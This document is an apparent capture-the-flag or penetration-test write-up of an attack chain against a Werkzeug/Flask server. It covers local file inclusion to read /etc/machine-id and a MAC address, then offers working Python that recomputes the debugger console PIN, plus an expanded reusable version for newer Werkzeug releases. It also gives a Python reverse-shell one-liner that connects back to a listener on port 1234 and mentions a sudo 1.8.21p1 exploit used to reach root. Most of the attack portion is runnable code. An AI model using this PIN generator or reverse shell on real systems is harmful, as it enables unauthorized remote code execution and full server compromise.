
Werkzeug httpd login bypass via LFI and Python + reverse shell + root


I found a Python script online that recomputes the PIN protecting the Werkzeug debugger console. The script needs two "private" values from the target, its machine-id and the MAC address of its network interface, plus a few "probably public" values (username the app runs as, module name, app class name and the path of flask/app.pyc) that are filled in by guessing.

Python file

import hashlib
from itertools import chain

probably_public_bits = [
    'aas',                                                  # username
    'flask.app',                                            # modname
    'Flask',                                                # getattr(app, '__name__', getattr(app.__class__, '__name__'))
    '/usr/local/lib/python2.7/dist-packages/flask/app.pyc'  # getattr(mod, '__file__', None)
]

private_bits = [
    '345052364024',                     # str(uuid.getnode()), decimal form of /sys/class/net/ens33/address
    '258f132cd7e647caaf5510e3aca997c1'  # get_machine_id(), /etc/machine-id
]

h = hashlib.md5()
for bit in chain(probably_public_bits, private_bits):
    if not bit:
        continue
    if isinstance(bit, str):
        bit = bit.encode('utf-8')
    h.update(bit)
h.update(b'cookiesalt')
#h.update(b'shittysalt')

cookie_name = '__wzd' + h.hexdigest()[:20]

num = None
if num is None:
    h.update(b'pinsalt')
    num = ('%09d' % int(h.hexdigest(), 16))[:9]

rv = None
if rv is None:
    for group_size in 5, 4, 3:
        if len(num) % group_size == 0:
            rv = '-'.join(num[x:x + group_size].rjust(group_size, '0')
                          for x in range(0, len(num), group_size))
            break
    else:
        rv = num

print(rv)

Luckily we found an LFI that lets us read both files: /etc/machine-id and /sys/class/net/ens33/address (the MAC of the interface).
One check before plugging the values in: the script expects the MAC as the decimal integer that str(uuid.getnode()) returns on the target, not the colon-separated hex that sysfs prints, so convert it first.
With the two private bits filled in, running the script prints the PIN.
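The same computation as a reusable function, as an added example that is not part of the original post or of Werkzeug itself. It adds the sysfs-MAC-to-decimal conversion the page's script leaves to the reader and returns the cookie name alongside the PIN. The hex MAC 00:50:56:b9:3c:f8 used in the demo is derived here from the decimal value 345052364024 in the page's script; the hash_name parameter is an assumption added so the same code can be tried against newer Werkzeug releases, which hash with SHA-1 and append the container id from /proc/self/cgroup to the machine-id (pass that concatenation as machine_id in that case).

```python
import hashlib
import re
from itertools import chain


def mac_to_node(mac: str) -> str:
    """Convert a sysfs MAC ("00:50:56:b9:3c:f8") to the decimal string
    str(uuid.getnode()) yields on the target; Werkzeug hashes that form."""
    return str(int(mac.strip().replace(':', ''), 16))


def werkzeug_pin(username, modname, appname, app_path, mac, machine_id,
                 hash_name='md5'):
    """Recompute the Werkzeug debugger PIN and cookie name offline.

    hash_name='md5' matches the page's script (older Werkzeug).  Newer
    Werkzeug uses sha1 and folds /proc/self/cgroup into the machine-id;
    that variant is an assumption here, pass hash_name='sha1' and the
    extended machine_id to try it.
    """
    probably_public_bits = [username, modname, appname, app_path]
    private_bits = [mac_to_node(mac), machine_id]

    h = hashlib.new(hash_name)
    for bit in chain(probably_public_bits, private_bits):
        if not bit:
            continue
        if isinstance(bit, str):
            bit = bit.encode('utf-8')
        h.update(bit)
    h.update(b'cookiesalt')
    cookie_name = '__wzd' + h.hexdigest()[:20]

    # PIN: first nine decimal digits of the salted digest, grouped 3-3-3
    h.update(b'pinsalt')
    num = ('%09d' % int(h.hexdigest(), 16))[:9]
    for group_size in 5, 4, 3:
        if len(num) % group_size == 0:
            pin = '-'.join(num[x:x + group_size].rjust(group_size, '0')
                           for x in range(0, len(num), group_size))
            break
    else:
        pin = num
    return pin, cookie_name


# Shape of every PIN this algorithm produces (nine digits, grouped by three).
PIN_RE = re.compile(r'^\d{3}-\d{3}-\d{3}$')

if __name__ == '__main__':
    # Values from the page's script; the MAC is the hex form of its
    # decimal 345052364024 and the machine-id is the one read via LFI.
    pin, cookie = werkzeug_pin(
        username='aas',
        modname='flask.app',
        appname='Flask',
        app_path='/usr/local/lib/python2.7/dist-packages/flask/app.pyc',
        mac='00:50:56:b9:3c:f8',
        machine_id='258f132cd7e647caaf5510e3aca997c1',
    )
    print('PIN:', pin, 'cookie:', cookie)
```

If the PIN is rejected, the usual culprits are the public bits (wrong username, app.py vs app.pyc, a different site-packages path) or the interface: /sys/class/net/ lists every interface, and Werkzeug's uuid.getnode() picks one of them, so try each MAC the LFI can read.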
With the PIN we unlocked the console. Executing shell commands directly from it failed, but a Python reverse shell worked. This is the command I pasted into the console (replace IP with the listener address; the listener was on port 1234, e.g. nc -lvnp 1234):

import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("IP",1234));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);

Next I checked the sudo version (sudo -V): 1.8.21p1, which is old enough that a well-known privilege-escalation exploit is available for it.

Sudo v1.8.21p1 Exploit

Running it gave us root!